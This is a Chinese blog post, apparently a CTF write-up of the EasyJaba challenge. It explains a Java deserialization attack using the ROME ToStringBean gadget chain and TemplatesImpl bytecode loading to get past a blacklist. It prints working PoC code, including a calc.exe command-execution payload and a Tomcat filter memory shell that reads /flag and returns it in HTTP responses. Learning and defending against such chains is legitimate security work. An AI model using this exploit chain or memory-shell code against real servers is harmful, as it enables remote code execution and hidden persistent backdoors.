从一道题看java反序列化和回显获取

最新推荐文章于 2024-04-02 10:27:42 发布
最新推荐文章于 2024-04-02 10:27:42 发布
阅读量196 收藏
点赞数
文章标签: java servlet 开发语言
原文链接:https://mp.weixin.qq.com/s?__biz=MzA5ODA0NDE2MA==&mid=2649774880&idx=1&sn=91ea92e6bbb346fa7d7572d068dae947
版权

前言

EasyJaba 这个题目是陇原战”疫”2021网络安全大赛的一道题,最近正好在学习java反序列化和内存马的相关知识,通过这个题目可以很好的进行实践。

反序列化

题目给了jar包,直接用jd-gui反编译看看

Base64decode直接给了readObject,很明显有反序列化的考点了,不过这里还有个神秘的object1和BlacklistObjectInputStream,应该是给的一些障碍

简单看了一下应用没看到实现了Serailizable接口的类,看下lib,发现了rome

应该就是从经典的ROME 1.0 任意代码执行反序列化链子入手了

直接用idea反编译,这次代码清楚多了

简单分析下就是给ObjectInputStream加了俩黑名单

java.util.HashMapjavax.management.BadAttributeValueExpException

再看ROME的反序列化链条

TemplatesImpl.getOutputProperties()NativeMethodAccessorImpl.invoke0(Method, Object, Object[])NativeMethodAccessorImpl.invoke(Object, Object[])DelegatingMethodAccessorImpl.invoke(Object, Object[])Method.invoke(Object, Object...)ToStringBean.toString(String)ToStringBean.toString()ObjectBean.toString()EqualsBean.beanHashCode()ObjectBean.hashCode()HashMap<K,V>.hash(Object)HashMap<K,V>.readObject(ObjectInputStream)

入口点就是从HashMap开始的,显然不能直接使用了

但是注意到代码直接给了toString

所以我们只需要把链子稍微改下就能用了,新的链子

TemplatesImpl.getOutputProperties()NativeMethodAccessorImpl.invoke0(Method, Object, Object[])NativeMethodAccessorImpl.invoke(Object, Object[])DelegatingMethodAccessorImpl.invoke(Object, Object[])Method.invoke(Object, Object...)ToStringBean.toString(String)ToStringBean.toString()

其实主要是利用了ROME的ToStringBean触发可控.invoke(可控,NO_PARAMS)然后利用TemplatesImpl这个类来实现任意代码执行

如何利用可控.invoke(可控,NO_PARAMS)实现任意代码执行

这其实是很多java反序列化导致任意代码执行的最后一环

这里我们利用的是TemplatesImpl.getOutputProperties()

简单写个Poc下断点跟下流程

import com.sun.org.apache.xalan.internal.xsltc.DOM;import com.sun.org.apache.xalan.internal.xsltc.TransletException;import java.lang.reflect.Constructor;import java.lang.reflect.Method;import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;import com.sun.org.apache.xml.internal.serializer.SerializationHandler;import javassist.ClassPool;import javassist.CtClass;import java.util.Properties;public class Poc {    public static class Evil extends com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet{        static {            //shell code here             System.out.println("Hello Java");         }        @Override         public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {         }        @Override         public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {         }     }    public static void main(String[] args) throws Exception{         ClassPool pool = ClassPool.getDefault();         CtClass clazz = pool.get(Evil.class.getName());        byte[][] bytecodes = new byte[][]{clazz.toBytecode()};         Class templatesimpl = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");         Class[] types = {byte[][].class, String.class, Properties.class, int.class, TransformerFactoryImpl.class};         Constructor constructor = templatesimpl.getDeclaredConstructor(types);         constructor.setAccessible(true);         TransformerFactoryImpl tf = new TransformerFactoryImpl();         Properties p = new Properties();         Object[] params = {bytecodes,"whatever",p,1,tf};         Object object = constructor.newInstance(params);         Method method = templatesimpl.getMethod("getOutputProperties");         method.invoke(object,null);     } }

首先进入

因为我们之前反射调用templatesImple的构造函数构造了一个对象

Object[] params = {bytecodes,"whatever",p,1,tf}; Object object = constructor.newInstance(params);

此时该templatesImpl的_bytecodes就是我们注入的恶意类字节码

下一步跳转到newTransformer

然后跳转到getTransletInstance

因为我们的templatesImple _class属性为null,会进入defineTransletClasses();

这个方法大致意思就是将我们的字节码,通过Classloader defineClass转成Class并存储在templatesImple的_class属性中

此处还会对class的父类进行检查如果是com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl,则将_transletIndex指向该位置

回到getTransletInstance,可以发现此时会实力话我们注入的恶意类,同时会强制类型转换成AbstractTranslet类型,这两处也是为什么我们需要将我们的恶意类继承com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet,不然无法触发此处构造函数

然后就能执行我们恶意类Evil里static代码块了。

言归正传,对于本题我们构造如下exp,这里也可以通过javassist手动加上父类

ClassPool pool = ClassPool.getDefault(); CtClass clazz = pool.get(E.class.getName()); clazz.setSuperclass(pool.get(Class.forName("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet").getName()));byte[][] bytecodes = new byte[][]{clazz.toBytecode()}; TemplatesImpl templatesimpl = new TemplatesImpl(); Field fieldByteCodes = templatesimpl.getClass().getDeclaredField("_bytecodes"); fieldByteCodes.setAccessible(true); fieldByteCodes.set(templatesimpl, bytecodes); Field fieldName = templatesimpl.getClass().getDeclaredField("_name"); fieldName.setAccessible(true); fieldName.set(templatesimpl, "test"); Field fieldTfactory = templatesimpl.getClass().getDeclaredField("_tfactory"); fieldTfactory.setAccessible(true); fieldTfactory.set(templatesimpl, Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl").newInstance()); ObjectBean objectBean = new ObjectBean(Templates.class, templatesimpl);

其中E为我们构造的恶意类用来执行代码比如

public static class E{        static  {            try {                 java.lang.Runtime.getRuntime().exec("calc.exe");             }catch (Throwable t){}         }     }

将生成的payload打过去以后可以发现弹出了计算器

获得回显

在可以命令执行后尝试了各种方法,但是发现拿不到命令执行的结果,后来发现有题目提示不出网…

不出网意味着类似反弹shell,curl,dnslog之类外带回显方式不可用了。加上并没有给静态文件的目录,将回显写入静态文件的方式也不好操作。这里利用内存马的思想,动态注入一个filter来获得回显。但是还有一个坑点在于由于我们的data是在url里注入的,如果太长的话会爆Request too Large的错误。所以我们要尽量缩短生成的类字节码大小。最终构造的恶意类如下。

public static class E{    static {        try {            //这里采取Litch1师傅文章的思路,通过WebappClassLoader拿到StandardContext             Class WebappClassLoaderBaseClz = Class.forName("org.apache.catalina.loader.WebappClassLoaderBase");             Object webappClassLoaderBase = Thread.currentThread().getContextClassLoader();             Field WebappClassLoaderBaseResource = WebappClassLoaderBaseClz.getDeclaredField("resources");             WebappClassLoaderBaseResource.setAccessible(true);             Object resources = WebappClassLoaderBaseResource.get(webappClassLoaderBase);             Class WebResourceRoot = Class.forName("org.apache.catalina.WebResourceRoot");             Method getContext = WebResourceRoot.getDeclaredMethod("getContext", null);            //拿到StandardContext后就可以通过addFilterMap方法注入filter型内存马了             StandardContext standardContext = (StandardContext) getContext.invoke(resources, null); Filter filter = (servletRequest, servletResponse, filterChain) -> {                         FileInputStream fis = new FileInputStream("/flag");                        byte[] buffer = new byte[16];                         StringBuilder res = new StringBuilder();                        while (fis.read(buffer) != -1) {                             res.append(new String(buffer));                             buffer = new byte[16];                         }                         fis.close();                         servletResponse.getWriter().write(res.toString());                         servletResponse.getWriter().flush();                     };             FilterDef filterDef = new FilterDef();             filterDef.setFilterName("A");             filterDef.setFilterClass(filter.getClass().getName());             filterDef.setFilter(filter);             standardContext.addFilterDef(filterDef);             FilterMap filterMap = new FilterMap();             filterMap.setFilterName("A");             filterMap.addURLPattern("/*");             standardContext.addFilterMap(filterMap);             standardContext.filterStart();            //本地测试时取消下面这行可以帮助观察是否注入成功             //System.out.println("injected");         }catch (Throwable t){            //t.printStackTrace();         }     } }

然后实际测试的时候发现自己带命令执行的生成的字节码都太长了,于是索性只读取”/flag”试试。

第一次访问

第二次访问,成功拿到flag

C陈三岁
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Java反序列化回显
02-09 1176
Java反序列化漏洞利用中,结果回显是一个需要解决的问,这里记录学习到的一些回显方法。
JAVA反序列化漏洞命令执行回显方法
K8哥哥
07-11 566
简介 在JAVA反序列化漏洞中,可能会有一些漏洞无法直接回显,这时我们可能需外带,通过WEB、FTP、DNS等外带,但是我不喜欢把自己的结果传到别人的网站上,本文教大家如何把结果回显到自己的VPS上,本文主要是JAVA代码,其它命令执行漏洞同理。 启动WEB Ladon web 9001 JAVA执行命令 javac main.java & java main 注意:get提交换行符需换成别的字符 import java.io.BufferedReader; import java.io.Inpu
java反序列化RCE回显研究
java276582434的博客
05-25 2471
总结一下常见反序列化RCE回显几种方式如下: a).使用java.net.URLClassLoader类,远程加载自定义类(放在自己服务器上的jar包),可以自定义方法执行。 b).在自定义类中,抛出异常,取得回显结果。 eg:Jboss报错返回命令执行结果。 利用defineClass加载byte[]返回Class对象,不用远程加载恶意类。 直接利用RCE将执行的命令写入服务器文件...
shell变量接收命令回显_JAVA反序列化基于常见框架_中间件回显方案
weixin_39711914的博客
12-18 153
这是酒仙桥六号部队的第68篇文章。全文共计2194个字,预计阅读时长8分钟。概述JAVA反序列化漏洞是JAVA中最常见的可以直接获取目标权限的漏洞,通过反序列化回显的思路也是越来越多,如通过远程加载回显、在目标网站写文件、通过URLClassLoader回显、借助dnslog回显等。这些思路多少都有些瓶颈。一旦遇到了目标因网络策略严格无法出网,则需要借助Dnslog的打法效果会失...
Java序列回显学习
weixin_47367099的博客
04-21 567
java反序列化回显 在很多不出网的情况下,一种是写webshell(内存嘛),另一种就是回显,本文先学习回显回显的主要方式有一下几种。 defineClass RMI绑定实例 URLClassLoader抛出异常 中间件 写文件css、js dnslog 前面有多多少了解过ClassLoader本篇花费一节仔细学习一下 1、前置知识 classloader顾名思义,即是类加载。虚拟机把描述类的数据从class字节码文件加载到内存,并对数据进行检验、转换解析和初始化,最终形成可以被虚拟机
基于Java实现回显示服务器
2301_77603222的博客
01-23 434
回显服务器是返回与客户端相同请求数据的一种服务器实现模式,服务器通过解析客户端发送的数据包,构造和返回与请求数据包内容一致的数据包。
Java实现文件回显
永远热血的少年
04-26 946
在项目中对已经保存的文件进行回显是经常需要做的,常用的是在后端将文件转为base64编码再传给前端,前端在展示文件的容器(比如最简单的img标签)的url里赋值传过来的base64码就可以回显文件。
Java反序列化漏洞利用工具(全)
09-14
java反序列化漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以……
java js图片上传回显
12-10
实现通过前端页面js将图片上传并回显到界面上
回显
lsx19981201的博客
02-25 640
&lt;%@ page contentType="text/html;charset=UTF-8" language="java" %&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Title&lt;/title&gt; &lt;script src="${pageContext.request.contextPat
java操作图片,异步同步上传回显
03-15
java页面选择图片即上传,并且在页面回显
Java反序列化回显解决方案.docx
10-26
Java反序列化回显解决方案.docx
Java安全之反序列化回显与内存码
最新发布
disrm84160的博客
04-02 1060
机会是留给有准备的人,大家在求职之前应该要明确自己的态度,熟悉求职流程,做好充分的准备,把一些可预见的事情做好。对于应届毕业生来说,校招更适合你们,因为绝大部分都不会有工作经验,企业也不会有工作经验的需求。同时,你也不需要伪造高大上的实战经验,以此让自己的简历能够脱颖而出,反倒会让面试官有所怀疑。你在大学时期应该明确自己的发展方向,如果你在大一就确定你以后想成为Java工程师,那就不要花太多的时间去学习其他的技术语言,高数之类的,不如好好想着如何夯实Java基础。请转发本文支持一下。
原来Java反序列化远程执行漏洞这么简单
systemino的博客
05-24 2162
在这里我们对Java反序列化引发的远程代码执行漏洞的原理进行介绍。为了简化说明,在不引入第3方库的前提下进行操作,希望能起到抛砖引玉的效果。 主要有3个部分组成: Java的反省机制 Java的序列化处理 Java的远程代码执行 Java的反射与代码执行 我们先看1个简单的例子,使用Java调用计算器程序:中国菜刀 import java.io.IOException; ...
陇原战2021网络安全大赛 Web EasyJaba
Sk1y的博客
07-02 1387
恶意字节码加载,Rome链,靶机不出网,使用Hashtable绕过入口类的限制,
templateslmpl利用链
qq_62046696的博客
03-13 385
cc3Jdk版本:调用AnnoctionInvocationHandler中的版本需要在,
[Java反序列化]rome反序列化学习
feng的博客
11-09 1280
前言 也算是忙里偷闲了,看了一下午的操作系统感觉自己就是傻子。。。晚上把前段时间的战比赛遇到的rome的反序列化链给学习了一下,之后应该还是继续课内的学习,除了打打比赛,其他的学习得等到寒假了。 分析 从网上找了利用链: TemplatesImpl.getOutputProperties() NativeMethodAccessorImpl.invoke0(Method, Object, Object[]) NativeMethodAccessorImpl.invoke(Object, Object[])
Java安全』反序列化-Rome 1.0反序列化POP链分析_ysoserial Rome payload分析
Ho1aAs‘s Blog
03-08 1909
文章目录前言版本代码审计 | 原理分析1. ToStringBean.toString()触发TemplatesImpl.getOutputProperties()手动调用ToStringBean.toString()示例代码2. EqualsBean.hashCode()触发toString()手动调用EqualsBean.hashCode()示例代码3. ObjectBean触发toString()或hashCode()手动调用ObjectBean.toString()和hashCode()示例代码4.
Java反序列化漏洞-ROME利用链分析
l11III1111的博客
12-04 3432
直接看到执行getOutputProperties的方法 调用了BeanIntrospector.getPropertyDescriptors(_beanClass)获取_beanClass中的所有的getter和setter方法。其中_beanClass是我们在ObjectBean中传入的一个class类型的对象 具体获取getter和setter方法在getPDs的另一个重载了的方法里面 而我们知道TemplatesImpl的getOutputProperties前面是以get开头的满足这个格式,
Java反序列化回显解决方案与安全分析
"Java反序列化回显解决方案" Java反序列化回显是一个重要的安全议,尤其是在网络安全领域。反序列化是指将已序列化的对象数据恢复为原来的对象状态,而这个过程如果处理不当,可能会被恶意利用。在Java中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值